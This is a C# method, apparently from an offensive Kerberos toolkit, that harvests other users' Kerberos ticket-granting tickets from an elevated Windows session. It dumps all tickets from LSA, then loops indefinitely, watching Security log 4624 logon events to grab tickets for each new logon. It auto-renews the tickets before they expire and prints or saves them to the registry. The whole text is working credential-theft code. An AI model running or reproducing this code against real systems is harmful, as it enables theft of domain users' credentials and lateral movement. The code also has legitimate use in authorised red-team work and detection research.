public static void HarvestTGTs(int intervalMinutes, string registryBasePath)
{
// First extract all TGTs then monitor the event log (indefinitely) for 4624 logon events
// every 'intervalMinutes' and dumps TGTs JUST for the specific logon IDs (LUIDs) based on the event log.
// On each interval, renew any tickets that are about to expire and refresh the cache.
// End result: every "intervalMinutes" a set of currently valid TGT .kirbi files are dumped to console
if (!Helpers.IsHighIntegrity())
{
Console.WriteLine("\r\n[X] You need to have an elevated context to dump other users' Kerberos tickets :( \r\n");
return;
}
Console.WriteLine("[*] Action: TGT Harvesting (w/ auto-renewal)");
Console.WriteLine("\r\n[*] Monitoring every {0} minutes for 4624 logon events\r\n", intervalMinutes);
// used to keep track of LUIDs we've already dumped
var seenLUIDs = new Dictionary <ulong, bool>();
// get the current set of TGTs
List <KRB_CRED> creds = LSA.ExtractTGTs(new Interop.LUID());
while (true)
{
// check for 4624 logon events in the past "intervalSeconds"
string queryString = String.Format("*[System[EventID=4624 and TimeCreated[timediff(@SystemTime) <= {0}]]]", intervalMinutes * 60 * 1000);
EventLogQuery eventsQuery = new EventLogQuery("Security", PathType.LogName, queryString);
EventLogReader logReader = new EventLogReader(eventsQuery);
for (EventRecord eventInstance = logReader.ReadEvent(); eventInstance != null; eventInstance = logReader.ReadEvent())
{
// if there's an event, extract out the logon ID (LUID) for the session
string eventMessage = eventInstance.FormatDescription();
DateTime eventTime = (DateTime)eventInstance.TimeCreated;
int startIndex = eventMessage.IndexOf("New Logon:");
string message = eventMessage.Substring(startIndex);
// extract out relevant information from the event log message
var acctNameExpression = new Regex(string.Format(@"\n.*Account Name:\s*(?<name>.+?)\r\n"));
Match acctNameMatch = acctNameExpression.Match(message);
var acctDomainExpression = new Regex(string.Format(@"\n.*Account Domain:\s*(?<domain>.+?)\r\n"));
Match acctDomainMatch = acctDomainExpression.Match(message);
if (acctNameMatch.Success)
{
var srcNetworkExpression = new Regex(string.Format(@"\n.*Source Network Address:\s*(?<address>.+?)\r\n"));
Match srcNetworkMatch = srcNetworkExpression.Match(message);
string logonName = acctNameMatch.Groups["name"].Value;
string accountDomain = "";
string srcNetworkAddress = "";
try
{
accountDomain = acctDomainMatch.Groups["domain"].Value;
}
catch { }
try
{
srcNetworkAddress = srcNetworkMatch.Groups["address"].Value;
}
catch { }
// ignore SYSTEM logons and other defaults
if (!Regex.IsMatch(logonName, @"SYSTEM|LOCAL SERVICE|NETWORK SERVICE|UMFD-[0-9]+|DWM-[0-9]+|ANONYMOUS LOGON", RegexOptions.IgnoreCase))
{
Console.WriteLine("\r\n[+] {0} - 4624 logon event for '{1}\\{2}' from '{3}'", eventTime, accountDomain, logonName, srcNetworkAddress);
var expression2 = new Regex(string.Format(@"\n.*Logon ID:\s*(?<id>.+?)\r\n"));
Match match2 = expression2.Match(message);
if (match2.Success)
{
try
{
// check if we've seen this LUID before
Interop.LUID luid = new Interop.LUID(match2.Groups["id"].Value);
if (!seenLUIDs.ContainsKey((ulong)luid))
{
seenLUIDs[luid] = true;
// if we haven't seen it, extract any TGTs for that particular logon ID and add to the cache
List <KRB_CRED> newCreds = LSA.ExtractTGTs(luid);
creds.AddRange(newCreds);
}
}
catch (Exception e)
{
Console.WriteLine("[X] Exception: {0}", e.Message);
}
}
}
}
}
for (int i = creds.Count - 1; i >= 0; i--)
{
DateTime endTime = TimeZone.CurrentTimeZone.ToLocalTime(creds[i].enc_part.ticket_info[0].endtime);
DateTime renewTill = TimeZone.CurrentTimeZone.ToLocalTime(creds[i].enc_part.ticket_info[0].renew_till);
// check if the ticket is going to expire before the next interval checkin
if (endTime < DateTime.Now.AddMinutes(intervalMinutes))
{
// check if the ticket's renewal limit will be valid within the next interval
if (renewTill < DateTime.Now.AddMinutes(intervalMinutes))
{
// renewal limit under checkin interval, so remove the ticket from the cache
creds.RemoveAt(i);
}
else
{
// renewal limit after checkin interval, so renew the TGT
string userName = creds[i].enc_part.ticket_info[0].pname.name_string[0];
string domainName = creds[i].enc_part.ticket_info[0].prealm;
Console.WriteLine("[*] Renewing TGT for {0}@{1}", userName, domainName);
byte[] bytes = Renew.TGT(creds[i], false, "", false);
KRB_CRED renewedCred = new KRB_CRED(bytes);
creds[i] = renewedCred;
}
}
}
Console.WriteLine("\r\n[*] {0} - Current usable TGTs:\r\n", DateTime.Now);
LSA.DisplayTGTs(creds);
if (registryBasePath != null)
{
LSA.SaveTicketsToRegistry(creds, registryBasePath);
}
Thread.Sleep(intervalMinutes * 60 * 1000);
}
}